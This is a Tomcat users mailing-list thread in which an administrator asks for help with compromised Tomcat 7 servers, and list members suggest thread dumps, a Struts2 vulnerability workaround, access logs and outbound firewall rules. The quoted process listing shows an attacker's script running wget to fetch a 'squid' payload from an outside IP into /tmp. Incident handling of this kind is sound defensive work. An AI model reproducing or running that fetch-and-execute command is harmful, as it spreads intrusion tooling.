few hours i will paste in pastebin access logs, config files, wherever you tell me. This is my pstree [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd ├─java─┬─sh───wget │ └─263*[{java}] sh launched by tomcat's java? Yes: please verify that it's the JVM running Tomcat, and not just any JVM process. Take a thread dump: https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F It shall show what is stacktrace in thread that launched external process. +1 The only things that ship with Tomcat that call Process.exec() are the CGI servlet and SSI, both of which are disabled by default. So, either you have an insecure CGI/SSI configuration, your web application has a vulnerability, or you have deployed something like the Manager application and improperly-secured it. A classic example of such an intrusion might be that someone got a foothold elsewhere into your network, and the Manager web application is not properly secured with a password, etc. - -chris -BEGIN PGP SIGNATURE- Version: GnuPG v1 Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBCAAGBQJTYQDeAAoJEBzwKT+lPKRYaPoQAKpqrj5bWfGXpEEHMINjw1Qp +qqdL7O61QLmWoA1neUbyM7A2s8mY3lRdcZwDw2IG33xoeLuFaavhFlDGr2Txer4 HiGDR8ixOv2mY9J9bMC889hih4N5dz0fYlw/b5SouUVz2aCbeUhYK+6lsBXRy2fC D+UoNOiQF6uX2ZlqJYZTAvgzC2t/SGGnTW3GLx+3buRxs4JlUjJ8RWEOZtjZLQ5o gUZ+UF6K/7dewYr6TjDmwc1C226dJNaliymQu2qbVgpRvoJ+baRgpeoyt6hzhIxr BA8gjKY5xOH6QrpSX2tdU8RNCRVLIgSmbp9Mj+Hovdw4kkDMLQvS3osuGq5HaEwS ZMltWiTef+K2yZyO3L8xrsJaRbox1j8Pg38ea22GRE48kpNagoQdCM2+uMCVN8Yj UFjUrcpMu0FX06dy8azbFDRZMv5lD8nmwgE624nT+gZfFaxGHNLa9dRpJWHZgvTb TSESKHv2lq9F4qc7bxoVrRDa8hnNLHk2luU9qot5JWXnb5en0fFKMZopwXwXYA4W
RE: Regarding i think an intrusion
Date: Wed, 30 Apr 2014 12:35:52 -0300 Subject: Re: Regarding i think an intrusion From: lsantagost...@gmail.com To: users@tomcat.apache.org Hello list, well my homework is done Here are the links: setenv.sh: http://pastebin.com/EN1mXDFi catalina.sh: http://pastebin.com/1vRVLbSm web.xml: http://pastebin.com/BqEfiXXm server.xml: http://pastebin.com/wfzE8bYU logging.properties: http://pastebin.com/Qurk8sLU catalina.properties: http://pastebin.com/jkfY1ZRQ tree + logsfiles: http://pastebin.com/j3tip4ij MGPor favor, pegue el contenido de los siguientes archivos de registros en Pastebin y enviarnos link: -rw-rw-r-- 1 tomcat tomcat 5.0K Apr 30 05:38 localhost.2014-04-30.log-rw-rw-r-- 1 tomcat tomcat 5.4M Apr 30 12:19 localhost_access_log.2014-04-30.txt -rw-rw-r-- 1 tomcat tomcat 0 Apr 30 05:38 manager.2014-04-30.log -rw-rw-r-- 1 tomcat tomcat 3.7M Apr 30 12:19 PDI_access_log.2014-04-30.txt-rw-rw-r-- 1 tomcat tomcat 43M Apr 30 12:18 portal-ht.log-rw-rw-r-- 1 tomcat tomcat 583K Apr 30 10:09 portal-mh.log-rw-rw-r-- 1 tomcat tomcat 58M Apr 30 12:19 portal-pdi.log-rw-rw-r-- 1 tomcat tomcat 3.5M Apr 30 12:18 portal-rt.log -rw-rw-r-- 1 tomcat tomcat 3.6M Apr 30 12:18 probe.log -rw-rw-r-- 1 tomcat tomcat 591K Apr 30 12:18 RT_access_log.2014-04-30.txt MGSaludos Cordiales desde EEUU Note that logsfiles, are not the logfiles itsef but only a ls -lah (just for you to see the logsizes) A little more about the infraestructure i've mounted ill do some ascii art. internet --- FW --nat--Haproxy (1)--Apache(2)-- mod_jk (3)--Haproxy(4)-- Tomcat7(5) -- haproxy(6) --Tomcat(7) Apache(2) is serving static content so haproxy(1) at the first level does http round robin balancing Apache(2) connects to tomcat(5) through haproxy(4) (using L4 connection) using mod_jk(3) Tomcat(5) are the main app server (the ones gets intruded) who uses tomcat(7) (solr service) using haproxy(6) using L4 connection. Versions: Apache: 2.2.17 mod_jk: 1.2.31 haproxy: 1.4.22 Tomcat: 7.0.53 Java: 1.6.0.41 [root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version java version 1.6.0_41 Java(TM) SE Runtime Environment (build 1.6.0_41-b02) Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode) OS: CentOS 5.8 64 bit [root@arcbaappvrt05 tomcat]# uname -a Linux arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb 21 20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux [root@arcbaappvrt05 tomcat]# cat /etc/redhat-release CentOS release 5.8 (Final) [root@arcbaappvrt05 tomcat]# For now i havent see that the squid process whas launched so i couldnt do a dump Letme know if you need more information. BTW, pastebin links will work for one week. Kind regards, yours Saludos.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini 2014-04-30 11:09 GMT-03:00 Leonardo Santagostini lsantagost...@gmail.com: Ok, i will do the following: 1) thread dump of running tomcat instance 2) Pastebin the running tomcat config I think at mid day will have all the info. Thanks all for replying me and all the responses. Regards, Leonardo Saludos.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini 2014-04-30 10:55 GMT-03:00 Christopher Schultz ch...@christopherschultz.net: -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Konstantin, On 4/29/14, 4:54 PM, Konstantin Kolinko wrote: 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini lsantagost...@gmail.com: Hello Dan, Nop, the attacker is executing locally the following tomcat8882 1 0 Apr27 ?00:00:00 sh /tmp/4.sh tomcat8893 8882 0 Apr27 ?00:00:00 wget http://218.199.102.59/.xy/squid32 -O /tmp/squid And the launch squid who tries to connect via ssh to varoius places. Right now its time to leave the office, but in a few hours i will paste in pastebin access logs, config files, wherever you tell me. This is my pstree [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd ├─java─┬─sh───wget │ └─263*[{java}] sh launched by tomcat's java? Yes: please verify that it's the JVM running Tomcat, and not just any JVM process. Take a thread dump: https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F It shall show what is stacktrace in thread that launched external process. +1 The only things that ship with Tomcat that call Process.exec() are the CGI servlet and SSI, both of which are disabled by default. So, either you have an insecure CGI/SSI configuration, your web application has a vulnerability, or you have deployed something like the Manager application and improperly-secured it. A classic example of such an intrusion might be that someone got a foothold elsewhere into your network, and the Manager web application is not properly
Re: Regarding i think an intrusion
On 30. April 2014 17:35:52 MESZ, Leonardo Santagostini lsantagost...@gmail.com wrote: Hello list, well my homework is done Here are the links: setenv.sh: http://pastebin.com/EN1mXDFi catalina.sh: http://pastebin.com/1vRVLbSm web.xml: http://pastebin.com/BqEfiXXm server.xml: http://pastebin.com/wfzE8bYU logging.properties: http://pastebin.com/Qurk8sLU catalina.properties: http://pastebin.com/jkfY1ZRQ tree + logsfiles: http://pastebin.com/j3tip4ij From the logfiles it looks like you have struts2 applications. It might be that you are hit by a security problem within struts2 ( Konstantin forwarded a warning a few days ago http://tomcat.10.x6.nabble.com/Fwd-ANN-Struts-2-up-to-2-3-16-1-Zero-Day-Exploit-Mitigation-security-critical-td5016578.html ). Note that logsfiles, are not the logfiles itsef but only a ls -lah (just for you to see the logsizes) A little more about the infraestructure i've mounted ill do some ascii art. internet --- FW --nat--Haproxy (1)--Apache(2)-- mod_jk (3)--Haproxy(4)-- Tomcat7(5) -- haproxy(6) --Tomcat(7) That seems a bit too complex. In my eyes you need no haproxy between httpd and tomcat when you use mod_jk. Regards Felix Apache(2) is serving static content so haproxy(1) at the first level does http round robin balancing Apache(2) connects to tomcat(5) through haproxy(4) (using L4 connection) using mod_jk(3) Tomcat(5) are the main app server (the ones gets intruded) who uses tomcat(7) (solr service) using haproxy(6) using L4 connection. Versions: Apache: 2.2.17 mod_jk: 1.2.31 haproxy: 1.4.22 Tomcat: 7.0.53 Java: 1.6.0.41 [root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version java version 1.6.0_41 Java(TM) SE Runtime Environment (build 1.6.0_41-b02) Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode) OS: CentOS 5.8 64 bit [root@arcbaappvrt05 tomcat]# uname -a Linux arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb 21 20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux [root@arcbaappvrt05 tomcat]# cat /etc/redhat-release CentOS release 5.8 (Final) [root@arcbaappvrt05 tomcat]# For now i havent see that the squid process whas launched so i couldnt do a dump Letme know if you need more information. BTW, pastebin links will work for one week. Kind regards, yours Saludos.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini 2014-04-30 11:09 GMT-03:00 Leonardo Santagostini lsantagost...@gmail.com: Ok, i will do the following: 1) thread dump of running tomcat instance 2) Pastebin the running tomcat config I think at mid day will have all the info. Thanks all for replying me and all the responses. Regards, Leonardo Saludos.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini 2014-04-30 10:55 GMT-03:00 Christopher Schultz ch...@christopherschultz.net: -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Konstantin, On 4/29/14, 4:54 PM, Konstantin Kolinko wrote: 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini lsantagost...@gmail.com: Hello Dan, Nop, the attacker is executing locally the following tomcat8882 1 0 Apr27 ?00:00:00 sh /tmp/4.sh tomcat8893 8882 0 Apr27 ?00:00:00 wget http://218.199.102.59/.xy/squid32 -O /tmp/squid And the launch squid who tries to connect via ssh to varoius places. Right now its time to leave the office, but in a few hours i will paste in pastebin access logs, config files, wherever you tell me. This is my pstree [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd ├─java─┬─sh───wget │ └─263*[{java}] sh launched by tomcat's java? Yes: please verify that it's the JVM running Tomcat, and not just any JVM process. Take a thread dump: https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F It shall show what is stacktrace in thread that launched external process. +1 The only things that ship with Tomcat that call Process.exec() are the CGI servlet and SSI, both of which are disabled by default. So, either you have an insecure CGI/SSI configuration, your web application has a vulnerability, or you have deployed something like the Manager application and improperly-secured it. A classic example of such an intrusion might be that someone got a foothold elsewhere into your network, and the Manager web application is not properly secured with a password, etc. - -chris -BEGIN PGP SIGNATURE- Version: GnuPG v1 Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBCAAGBQJTYQDeAAoJEBzwKT+lPKRYaPoQAKpqrj5bWfGXpEEHMINjw1Qp +qqdL7O61QLmWoA1neUbyM7A2s8mY3lRdcZwDw2IG33xoeLuFaavhFlDGr2Txer4 HiGDR8ixOv2mY9J9bMC889hih4N5dz0fYlw/b5SouUVz2aCbeUhYK+6lsBXRy2fC D+UoNOiQF6uX2ZlqJYZTAvgzC2t/SGGnTW3GLx+3buRxs4JlUjJ8RWEOZtjZLQ5o gUZ+UF6K/7dewYr6TjDmwc1C226dJNaliymQu2qbVgpRvoJ+baRgpeoyt6hzhIxr
Re: Regarding i think an intrusion
Hello Martin/Felix, Im uploading mi logfiles so it will be available when finished uploading. Regarding the configuration, its working in two other sites without problem, and there is no problem putting L4 balancing with haproxy. I have asked developers about that exploit, still without answer. I will let you know how things are going, thanks for all =) Regards/Saludos! BTW: Martin, thanks for your spanish words Really appreciate =) Saludos.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini 2014-04-30 13:20 GMT-03:00 Felix Schumacher felix.schumac...@internetallee.de: On 30. April 2014 17:35:52 MESZ, Leonardo Santagostini lsantagost...@gmail.com wrote: Hello list, well my homework is done Here are the links: setenv.sh: http://pastebin.com/EN1mXDFi catalina.sh: http://pastebin.com/1vRVLbSm web.xml: http://pastebin.com/BqEfiXXm server.xml: http://pastebin.com/wfzE8bYU logging.properties: http://pastebin.com/Qurk8sLU catalina.properties: http://pastebin.com/jkfY1ZRQ tree + logsfiles: http://pastebin.com/j3tip4ij From the logfiles it looks like you have struts2 applications. It might be that you are hit by a security problem within struts2 ( Konstantin forwarded a warning a few days ago http://tomcat.10.x6.nabble.com/Fwd-ANN-Struts-2-up-to-2-3-16-1-Zero-Day-Exploit-Mitigation-security-critical-td5016578.html). Note that logsfiles, are not the logfiles itsef but only a ls -lah (just for you to see the logsizes) A little more about the infraestructure i've mounted ill do some ascii art. internet --- FW --nat--Haproxy (1)--Apache(2)-- mod_jk (3)--Haproxy(4)-- Tomcat7(5) -- haproxy(6) --Tomcat(7) That seems a bit too complex. In my eyes you need no haproxy between httpd and tomcat when you use mod_jk. Regards Felix Apache(2) is serving static content so haproxy(1) at the first level does http round robin balancing Apache(2) connects to tomcat(5) through haproxy(4) (using L4 connection) using mod_jk(3) Tomcat(5) are the main app server (the ones gets intruded) who uses tomcat(7) (solr service) using haproxy(6) using L4 connection. Versions: Apache: 2.2.17 mod_jk: 1.2.31 haproxy: 1.4.22 Tomcat: 7.0.53 Java: 1.6.0.41 [root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version java version 1.6.0_41 Java(TM) SE Runtime Environment (build 1.6.0_41-b02) Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode) OS: CentOS 5.8 64 bit [root@arcbaappvrt05 tomcat]# uname -a Linux arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb 21 20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux [root@arcbaappvrt05 tomcat]# cat /etc/redhat-release CentOS release 5.8 (Final) [root@arcbaappvrt05 tomcat]# For now i havent see that the squid process whas launched so i couldnt do a dump Letme know if you need more information. BTW, pastebin links will work for one week. Kind regards, yours Saludos.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini 2014-04-30 11:09 GMT-03:00 Leonardo Santagostini lsantagost...@gmail.com: Ok, i will do the following: 1) thread dump of running tomcat instance 2) Pastebin the running tomcat config I think at mid day will have all the info. Thanks all for replying me and all the responses. Regards, Leonardo Saludos.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini 2014-04-30 10:55 GMT-03:00 Christopher Schultz ch...@christopherschultz.net: -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Konstantin, On 4/29/14, 4:54 PM, Konstantin Kolinko wrote: 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini lsantagost...@gmail.com: Hello Dan, Nop, the attacker is executing locally the following tomcat8882 1 0 Apr27 ?00:00:00 sh /tmp/4.sh tomcat8893 8882 0 Apr27 ?00:00:00 wget http://218.199.102.59/.xy/squid32 -O /tmp/squid And the launch squid who tries to connect via ssh to varoius places. Right now its time to leave the office, but in a few hours i will paste in pastebin access logs, config files, wherever you tell me. This is my pstree [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd ├─java─┬─sh───wget │ └─263*[{java}] sh launched by tomcat's java? Yes: please verify that it's the JVM running Tomcat, and not just any JVM process. Take a thread dump: https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F It shall show what is stacktrace in thread that launched external process. +1 The only things that ship with Tomcat that call Process.exec() are the CGI servlet and SSI, both of which are disabled by default. So, either you have an insecure CGI/SSI configuration, your web application has a vulnerability, or you have deployed something like the Manager application
Re: Regarding i think an intrusion
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Leonardo, On 4/30/14, 12:48 PM, Leonardo Santagostini wrote: Im uploading mi logfiles so it will be available when finished uploading. Remember to get a thread dump while Runtime.exec() is running. You should copy the script /tmp/4.sh somewhere else so you have a copy in case the attacker tries to clean-up after themselves. That's certainly what's doing the evil work. You could probably set up iptables or something to restrict outgoing requests so that the attack can't progress across your network. Regarding the configuration, its working in two other sites without problem, and there is no problem putting L4 balancing with haproxy. I have asked developers about that exploit, still without answer. You appear to be using struts2 2.1.8, which is in the range of versions vulnerable to this bug. There is a workaround that you can probably apply: http://struts.apache.org/release/2.3.x/docs/s2-021.html (see the last section on this page). Of course, the vulnerability doesn't allow you to simply inject code or anything like that: you can certainly mess-around with code that is already available on the site, though. - -chris -BEGIN PGP SIGNATURE- Version: GnuPG v1 Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBCAAGBQJTYS3BAAoJEBzwKT+lPKRYqDsP/jmNjM+YwxySFGgPUuvcL2bN kkApblcr9ryGZQG6RGwUFr69FCJ8qFDQSZ0aXXxPCfTpM6ce1VqXPv+WcOwnueOF mrugSa2InF2IWPAP2lwhEGqyxRAYZGfxz0aA9sFb7sSw4IpDP7u6TJx9g3oYrLTt URIbzTfhY0aGgEkQlrWNgrAWFKsUQ0uOrg8+3IS52O/e1ZVdudTMQBh5/LLJ522p yr+TlMooKDY8OA1TYttE0zEe3/Z9dd2AZ4YHoqLy8Hwq0lufYSaFZ5TpHfiOgJ0I 0Q3dcXEmjMTrBkBm4JKBR9b6KZSvG/H42q0GsEFHZeGw+3VIqYFGVRR5iCRRvVgg cqVKgGevB+fefcbGX9IFgFnus8QMUYq4XOcsE1YJVflxVBEfgwsCDLZEJqpzbovV ZpNBimPoLc8I5ifo2o7GSkO1GNSjhD7Q9p5MnmNW7Qna9RJh67Lv2oft9yPqGvjZ F2dTgbKFqyr8GSy/X4Ji8FsoeK+YxF0zXXDkaXxJzu054LuhodLCHJu7WwnwGjjL 0VI/Xxfihzk9+u3HNuwK0HTEt40Tca+vEKDUlMa9fvHL3ZqM3upy50bGE0PCTrJO A1cI+e0lzKEEQ+maym65DmSYiVvUPnfv0AxA0iUfU/UbhV1yWEkD3TyF3dOZPZqH ob6Km1Clt4KNLKVyQjt+ =8KFm -END PGP SIGNATURE- - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
Re: Regarding i think an intrusion
Hello Christopher, thanks for your response. I have a copy of 4.sh and squid (binary ELF file) and tried to see using strings what this program do. I couldn’t see anything =( Im monitoring the server for getting a dump at the moment this injection occurs. Files still uploanding =( Thanks for all, kind regards Saludos.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini 2014-04-30 14:07 GMT-03:00 Christopher Schultz ch...@christopherschultz.net : -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Leonardo, On 4/30/14, 12:48 PM, Leonardo Santagostini wrote: Im uploading mi logfiles so it will be available when finished uploading. Remember to get a thread dump while Runtime.exec() is running. You should copy the script /tmp/4.sh somewhere else so you have a copy in case the attacker tries to clean-up after themselves. That's certainly what's doing the evil work. You could probably set up iptables or something to restrict outgoing requests so that the attack can't progress across your network. Regarding the configuration, its working in two other sites without problem, and there is no problem putting L4 balancing with haproxy. I have asked developers about that exploit, still without answer. You appear to be using struts2 2.1.8, which is in the range of versions vulnerable to this bug. There is a workaround that you can probably apply: http://struts.apache.org/release/2.3.x/docs/s2-021.html (see the last section on this page). Of course, the vulnerability doesn't allow you to simply inject code or anything like that: you can certainly mess-around with code that is already available on the site, though. - -chris -BEGIN PGP SIGNATURE- Version: GnuPG v1 Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBCAAGBQJTYS3BAAoJEBzwKT+lPKRYqDsP/jmNjM+YwxySFGgPUuvcL2bN kkApblcr9ryGZQG6RGwUFr69FCJ8qFDQSZ0aXXxPCfTpM6ce1VqXPv+WcOwnueOF mrugSa2InF2IWPAP2lwhEGqyxRAYZGfxz0aA9sFb7sSw4IpDP7u6TJx9g3oYrLTt URIbzTfhY0aGgEkQlrWNgrAWFKsUQ0uOrg8+3IS52O/e1ZVdudTMQBh5/LLJ522p yr+TlMooKDY8OA1TYttE0zEe3/Z9dd2AZ4YHoqLy8Hwq0lufYSaFZ5TpHfiOgJ0I 0Q3dcXEmjMTrBkBm4JKBR9b6KZSvG/H42q0GsEFHZeGw+3VIqYFGVRR5iCRRvVgg cqVKgGevB+fefcbGX9IFgFnus8QMUYq4XOcsE1YJVflxVBEfgwsCDLZEJqpzbovV ZpNBimPoLc8I5ifo2o7GSkO1GNSjhD7Q9p5MnmNW7Qna9RJh67Lv2oft9yPqGvjZ F2dTgbKFqyr8GSy/X4Ji8FsoeK+YxF0zXXDkaXxJzu054LuhodLCHJu7WwnwGjjL 0VI/Xxfihzk9+u3HNuwK0HTEt40Tca+vEKDUlMa9fvHL3ZqM3upy50bGE0PCTrJO A1cI+e0lzKEEQ+maym65DmSYiVvUPnfv0AxA0iUfU/UbhV1yWEkD3TyF3dOZPZqH ob6Km1Clt4KNLKVyQjt+ =8KFm -END PGP SIGNATURE- - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
Re: Regarding i think an intrusion
Hi, I am learning to set up a server and I found this article about security http://mon-serveur.anael.eu/doku.php/securite/firewall_iptables On Tue, Apr 29, 2014 at 9:08 PM, Leonardo Santagostini lsantagost...@gmail.com wrote: Hello list, Im facing an issue in 6 tomcat server that are getting penetrated and they are executing malicious scripts on my server. Im using 7.0.53 on my servers. Running Centos 5.8 Let me know what information you need. PS: This is my first mail to this list, so i apologize for this not gentle presentation. Saludos.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini
Re: Regarding i think an intrusion
On Apr 29, 2014, at 12:08 PM, Leonardo Santagostini lsantagost...@gmail.com wrote: Hello list, Im facing an issue in 6 tomcat server that are getting penetrated and they are executing malicious scripts on my server. Can you share more about what they are doing? It might give some clues as to how they are accessing your machines. For example, if they are deploying a WAR file to your server, it could mean that they have access to the Manager application on your server. Any details you can share, might be helpful. Im using 7.0.53 on my servers. Running Centos 5.8 Let me know what information you need. Do you have an access log? If not, enable one. If the attacker is not deleting it, it could show you more about who they are and what requests they are executing to access your server. Assuming they are entering through your application and not some other way. Dan PS: This is my first mail to this list, so i apologize for this not gentle presentation. Saludos.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
Re: Regarding i think an intrusion
Hello Dan, Nop, the attacker is executing locally the following tomcat8882 1 0 Apr27 ?00:00:00 sh /tmp/4.sh tomcat8893 8882 0 Apr27 ?00:00:00 wget http://218.199.102.59/.xy/squid32 -O /tmp/squid And the launch squid who tries to connect via ssh to varoius places. Right now its time to leave the office, but in a few hours i will paste in pastebin access logs, config files, wherever you tell me. This is my pstree [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd ├─atop ├─crond ├─dbus-daemon ├─events/0 ├─events/1 ├─events/2 ├─events/3 ├─httpd───8*[httpd] ├─irqbalance ├─2*[iscsid] ├─iscsiuio───3*[{iscsiuio}] ├─java─┬─sh───wget │ └─263*[{java}] ├─khelper By the way, logfiles are really big, 200 mb each one, ill try to set up a dropbox account so i can share it. Thanks and regards Saludos.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini 2014-04-29 17:34 GMT-03:00 Daniel Mikusa dmik...@gopivotal.com: On Apr 29, 2014, at 12:08 PM, Leonardo Santagostini lsantagost...@gmail.com wrote: Hello list, Im facing an issue in 6 tomcat server that are getting penetrated and they are executing malicious scripts on my server. Can you share more about what they are doing? It might give some clues as to how they are accessing your machines. For example, if they are deploying a WAR file to your server, it could mean that they have access to the Manager application on your server. Any details you can share, might be helpful. Im using 7.0.53 on my servers. Running Centos 5.8 Let me know what information you need. Do you have an access log? If not, enable one. If the attacker is not deleting it, it could show you more about who they are and what requests they are executing to access your server. Assuming they are entering through your application and not some other way. Dan PS: This is my first mail to this list, so i apologize for this not gentle presentation. Saludos.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
Re: Regarding i think an intrusion
sorry, but i forget to post /usr/java/default/bin/java -version java version 1.6.0_41 Java(TM) SE Runtime Environment (build 1.6.0_41-b02) Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode) Saludos.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini 2014-04-29 17:41 GMT-03:00 Leonardo Santagostini lsantagost...@gmail.com: Hello Dan, Nop, the attacker is executing locally the following tomcat8882 1 0 Apr27 ?00:00:00 sh /tmp/4.sh tomcat8893 8882 0 Apr27 ?00:00:00 wget http://218.199.102.59/.xy/squid32 -O /tmp/squid And the launch squid who tries to connect via ssh to varoius places. Right now its time to leave the office, but in a few hours i will paste in pastebin access logs, config files, wherever you tell me. This is my pstree [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd ├─atop ├─crond ├─dbus-daemon ├─events/0 ├─events/1 ├─events/2 ├─events/3 ├─httpd───8*[httpd] ├─irqbalance ├─2*[iscsid] ├─iscsiuio───3*[{iscsiuio}] ├─java─┬─sh───wget │ └─263*[{java}] ├─khelper By the way, logfiles are really big, 200 mb each one, ill try to set up a dropbox account so i can share it. Thanks and regards Saludos.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini 2014-04-29 17:34 GMT-03:00 Daniel Mikusa dmik...@gopivotal.com: On Apr 29, 2014, at 12:08 PM, Leonardo Santagostini lsantagost...@gmail.com wrote: Hello list, Im facing an issue in 6 tomcat server that are getting penetrated and they are executing malicious scripts on my server. Can you share more about what they are doing? It might give some clues as to how they are accessing your machines. For example, if they are deploying a WAR file to your server, it could mean that they have access to the Manager application on your server. Any details you can share, might be helpful. Im using 7.0.53 on my servers. Running Centos 5.8 Let me know what information you need. Do you have an access log? If not, enable one. If the attacker is not deleting it, it could show you more about who they are and what requests they are executing to access your server. Assuming they are entering through your application and not some other way. Dan PS: This is my first mail to this list, so i apologize for this not gentle presentation. Saludos.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
Re: Regarding i think an intrusion
2014-04-30 0:41 GMT+04:00 Leonardo Santagostini lsantagost...@gmail.com: Hello Dan, Nop, the attacker is executing locally the following tomcat8882 1 0 Apr27 ?00:00:00 sh /tmp/4.sh tomcat8893 8882 0 Apr27 ?00:00:00 wget http://218.199.102.59/.xy/squid32 -O /tmp/squid And the launch squid who tries to connect via ssh to varoius places. Right now its time to leave the office, but in a few hours i will paste in pastebin access logs, config files, wherever you tell me. This is my pstree [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd ├─java─┬─sh───wget │ └─263*[{java}] sh launched by tomcat's java? Take a thread dump: https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F It shall show what is stacktrace in thread that launched external process. Best regards, Konstantin Kolinko - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org